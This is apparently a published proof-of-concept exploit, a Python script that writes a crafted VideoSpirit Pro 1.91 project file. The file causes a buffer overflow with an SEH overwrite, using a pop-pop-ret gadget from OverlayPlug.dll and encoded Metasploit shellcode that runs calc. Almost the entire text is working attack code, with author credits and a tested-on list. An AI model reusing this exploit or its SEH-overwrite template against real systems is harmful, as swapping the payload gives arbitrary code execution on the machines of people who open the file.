VideoSpirit Pro version 1.91 buffer overflow with SEH bypass exploit.
4a610b7c8fb559b4026157db23297421051705f258bfe8264267c8d6838a889f
#!/usr/bin/python
# Exploit Title: VideoSpirit Pro v1.91
# Date: 27/April/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003@yahoo.com
# Version: 1.91
# Tested on: Win XP3 and Win 7
#Vendor: http://www.verytools.com/
#Software link: http://www.verytools.com/videospirit/download.html
#Greetz: b33f,corelan,offsec,vulnhub,HUST510
buffersize=5000
Header=("\x3C\x76\x65\x72\x73\x69\x6F\x6E\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x22\x20"+
"\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70"+
"\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20"+
"\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x34\x22\x20\x2F\x3E\x0A"+
"\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65\x3D\x22\x32\x22"+
"\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76\x61\x6C\x75\x65"+
"\x3D\x22\x31\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x37\x22\x20\x2F\x3E\x0A\x3C\x2F\x74\x72\x61\x63\x6B"+
"\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x30\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B"+
"\x31\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x32\x20\x2F\x3E\x0A\x3C\x74\x72"+
"\x61\x63\x6B\x33\x20\x2F\x3E\x0A\x3C\x74\x72\x61\x63\x6B\x34\x20\x2F\x3E\x0A"+
"\x3C\x63\x6C\x69\x70\x20\x2F\x3E\x0A\x3C\x6F\x75\x74\x70\x75\x74\x20\x74\x79"+
"\x70\x65\x6E\x61\x6D\x65\x3D\x22\x41\x56\x49\x22\x20\x6B\x65\x65\x70\x61\x73"+
"\x70\x65\x63\x74\x3D\x22\x30\x22\x20\x70\x72\x65\x73\x65\x74\x71\x75\x61\x6C"+
"\x69\x74\x79\x3D\x22\x30\x22\x3E\x0A\x20\x20\x20\x20\x3C\x74\x79\x70\x65\x30"+
"\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31\x22\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x73"+
"\x6D\x70\x65\x67\x34\x76\x32\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x6D\x73\x6D"+
"\x70\x65\x67\x34\x76\x32\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20"+
"\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x32\x30\x2A"+
"\x32\x34\x30\x28\x34\x3A\x33\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x33\x32"+
"\x30\x2A\x32\x34\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C"+
"\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x33\x30\x22\x20\x76"+
"\x61\x6C\x75\x65\x3D\x22\x33\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20"+
"\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x36"+
"\x30\x30\x30\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x31\x36\x30\x30\x30\x6B"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x30\x3E\x0A\x20"+
"\x20\x20\x20\x3C\x74\x79\x70\x65\x31\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x31"+
"\x22\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D"+
"\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x70\x33\x22\x20\x76\x61\x6C\x75\x65\x3D\x22")
buffer="A"*104
buffer += "\xEB\x07\x90\x90"
#0x100caa30 : pop ebp # pop ecx # ret | {PAGE_EXECUTE_READ} [OverlayPlug.dll]
buffer +="\x30\xaa\x0C\x10"
buffer += "\x90" * 24
#msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x21\x22" -t c -e x86/shikata_ga_nai
buffer += ("\xd9\xc3\xba\x97\xfd\x6f\x90\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x32\x31\x56\x17\x03\x56\x17\x83\x79\x01\x8d\x65\x79\x12\xdb"
"\x86\x81\xe3\xbc\x0f\x64\xd2\xee\x74\xed\x47\x3f\xfe\xa3\x6b"
"\xb4\x52\x57\xff\xb8\x7a\x58\x48\x76\x5d\x57\x49\xb6\x61\x3b"
"\x89\xd8\x1d\x41\xde\x3a\x1f\x8a\x13\x3a\x58\xf6\xdc\x6e\x31"
"\x7d\x4e\x9f\x36\xc3\x53\x9e\x98\x48\xeb\xd8\x9d\x8e\x98\x52"
"\x9f\xde\x31\xe8\xd7\xc6\x3a\xb6\xc7\xf7\xef\xa4\x34\xbe\x84"
"\x1f\xce\x41\x4d\x6e\x2f\x70\xb1\x3d\x0e\xbd\x3c\x3f\x56\x79"
"\xdf\x4a\xac\x7a\x62\x4d\x77\x01\xb8\xd8\x6a\xa1\x4b\x7a\x4f"
"\x50\x9f\x1d\x04\x5e\x54\x69\x42\x42\x6b\xbe\xf8\x7e\xe0\x41"
"\x2f\xf7\xb2\x65\xeb\x5c\x60\x07\xaa\x38\xc7\x38\xac\xe4\xb8"
"\x9c\xa6\x06\xac\xa7\xe4\x4c\x33\x25\x93\x29\x33\x35\x9c\x19"
"\x5c\x04\x17\xf6\x1b\x99\xf2\xb3\xd4\xd3\x5f\x95\x7c\xba\x35"
"\xa4\xe0\x3d\xe0\xea\x1c\xbe\x01\x92\xda\xde\x63\x97\xa7\x58"
"\x9f\xe5\xb8\x0c\x9f\x5a\xb8\x04\xfc\x3d\x2a\xc4\x03")
buffer +="A"*(buffersize - (len(buffer)))
Footer=("\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65"+
"\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x31\x32\x38\x6B\x22\x20\x76\x61\x6C\x75\x65\x3D"+
"\x22\x31\x32\x38\x6B\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x76"+
"\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20"+
"\x76\x61\x6C\x75\x65\x3D\x22\x34\x34\x31\x30\x30\x22\x20\x2F\x3E\x0A\x20\x20\x20"+
"\x20\x20\x20\x20\x20\x3C\x76\x61\x6C\x69\x74\x65\x6D\x20\x6E\x61\x6D\x65\x3D\x22"+
"\x32\x20\x28\x53\x74\x65\x72\x65\x6F\x29\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x32"+
"\x22\x20\x2F\x3E\x0A\x20\x20\x20\x20\x3C\x2F\x74\x79\x70\x65\x31\x3E\x0A\x20\x20"+
"\x20\x20\x3C\x74\x79\x70\x65\x32\x20\x65\x6E\x61\x62\x6C\x65\x3D\x22\x30\x22\x20"+
"\x2F\x3E\x0A\x3C\x2F\x6F\x75\x74\x70\x75\x74\x3E")
sploit = Header + buffer + Footer
try:
print "[+]Creating Exploit File...\n"
file = open("evil.visprj","w")
file.write(sploit)
file.close
print "[+]File evil.visprj create successfully.\n"
except:
print "*Failed to create file!!!\n"